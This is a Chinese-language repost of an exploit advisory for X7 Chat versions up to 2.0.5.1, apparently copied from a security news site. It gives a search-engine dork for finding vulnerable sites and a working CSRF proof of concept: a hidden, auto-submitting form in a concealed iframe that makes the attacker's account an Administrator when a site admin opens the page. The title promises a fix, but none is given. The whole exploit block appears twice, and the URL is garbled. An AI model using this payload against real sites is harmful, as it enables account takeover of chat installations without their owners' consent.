X7 Chat 2.0.5.1及以下版本CSRF添加管理员缺陷及修复
鲍高扬
标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
关键词: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
作者: DennSpec 下载 地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
影响版本: <= 2.0.5.1
首先注册获得一个用户名
(frame.html in path of your main html page)
<html>
<body οnlοad="document.xform.submit();">
<form name="xform" action="http:// www.2cto.com /x7path/index. php ?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
<input type="hidden" name="username" value="YOURUSERNAME" />
<input type="hidden" name="usergroup" value="Administrator" />
</form>
</body>
</html>
替换http://www.xxx..com /x7path/为你的目标地址. 别忘了替换 YOURUSERNAME 到YOURUSERNAME.
add this code to inside body tag of main html page:
<iframe style="display:none;" src="frame.html"></iframe>
and... upload main page and frame.html .
把这个页面传给任意管理员。。。
关键词: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
作者: DennSpec 下载 地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
影响版本: <= 2.0.5.1
首先注册获得一个用户名
(frame.html in path of your main html page)
<html>
<body οnlοad="document.xform.submit();">
<form name="xform" action="http:// www.2cto.com /x7path/index. php ?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
<input type="hidden" name="username" value="YOURUSERNAME" />
<input type="hidden" name="usergroup" value="Administrator" />
</form>
</body>
</html>
替换http://www.xxx..com /x7path/为你的目标地址. 别忘了替换 YOURUSERNAME 到YOURUSERNAME.
add this code to inside body tag of main html page:
<iframe style="display:none;" src="frame.html"></iframe>
and... upload main page and frame.html .
把这个页面传给任意管理员。。。
类似资料: